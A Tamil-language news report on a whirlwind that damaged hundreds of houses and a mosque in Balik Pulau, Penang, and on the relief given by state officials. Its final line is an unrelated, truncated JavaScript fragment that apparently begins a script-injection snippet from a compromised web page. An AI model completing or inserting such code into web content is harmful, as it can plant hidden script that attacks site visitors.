வெள்ளப் பேரிடரால் கிழக்குக்கரையோர மாநிலங்கள் மிகவும் மோசமாகப் பாதிக்கப்பட்ட வேளையில் “langkisau” எனும் சுழல்காற்று ஒரு மணி நேரத்திற்கு 50கி.மீட்டர் என்ற வேகத்தில் வீசப்பட்டு பினாங்கு மாநில பலே புலாவ் எனும் பகுதி பாதிக்கப்பட்டுள்ளது. இந்தச் சுழல்காற்றினால் சுங்கை ராசா பகுதியில் 242 வீடுகளும், பெர்மாத்தாங் பாசிர் பகுதியில் 102 வீடுகளும் பாதிக்கப்பட்டுள்ளன. பாதிக்கப்பட்ட சுற்று வட்டார மக்கள் இதுவரை காவல் நிலையத்தில் 500 புகார்கள் கொடுத்துள்ளனர்.
இந்தச் சுழல்காற்றினால் கம்போங் சுங்கை ராசா, பெர்மாத்தாங் பாசிர், சுங்கை பினாங்கு, பந்தாய் அச்சே, ஜாலான் பாரு, கம்போங் ஜாலான் பாரு மற்றும் சுங்கை பினாங்கு ஆகிய பகுதிகள் அதிகமாகப் பாதிக்கப்பட்டுள்ளன. மேலும் பலே புலாவ் செல்லும் பிரதான சாலைகளிலும் மரங்கள் வேரோடு சாய்ந்து வாகனங்கள் சேதமடைந்துள்ளன. சுங்கை ராசா மசூதி குவிமாடமும் சேதமடைந்துள்ளது.
மாநில முதல்வர் மேதகு லிம் குவான் எங் சுங்கை ராசா மசூதியையும் அதன் சுற்று வட்டார வீடமைப்புப் பகுதிகளையும் சென்றுப் பார்த்தார். பொது மக்களுக்கு ஆறுதல் கூறியதோடு சிறு உதவித்தொகையும் வழங்கினார். மாநில அரசு பாதிக்கப்பட்ட மக்களுக்குத் தொடர்ந்து உதவி வழங்கும் என்றார். சம்பவம் நிகழ்ந்த இடத்திற்கு நேரடியாக விரைந்து பொது மக்களுக்கு உதவிக்கரம் நீட்டினார் உள்ளூராட்சி,போக்குவரத்து மேலாண்மை ஆட்சிக்குழு உறுப்பினர் சாவ் கொன் யாவ். தென்மேற்கு மாவட்ட அலுவலகம் உடனடி உதவி வழங்குமாறு பணித்தார்.
மேலும், ஏறக்குறைய 100 பினாங்கு நகராண்மைக் கழக உறுப்பினர்கள் பாதிக்கப்பட்ட மக்களுக்கு உதவிச்செய்தனர். தெலுக் பஹாங் பகுதித் தலைவர் அமிருடின் முகமது காசிம் அவர்கள் எவ்வித உயிர் சேதமும் ஏற்படவில்லை என்றார். சுங்கை ராசா மசூதி சேதமடைந்ததால் பாதிக்கப்பட்ட பொது மக்கள் சுங்கை ராசா தேசியப் பள்ளியில் தஞ்சம் புகுந்தனர்.
var d=document;var s=d.createElement(‘script’);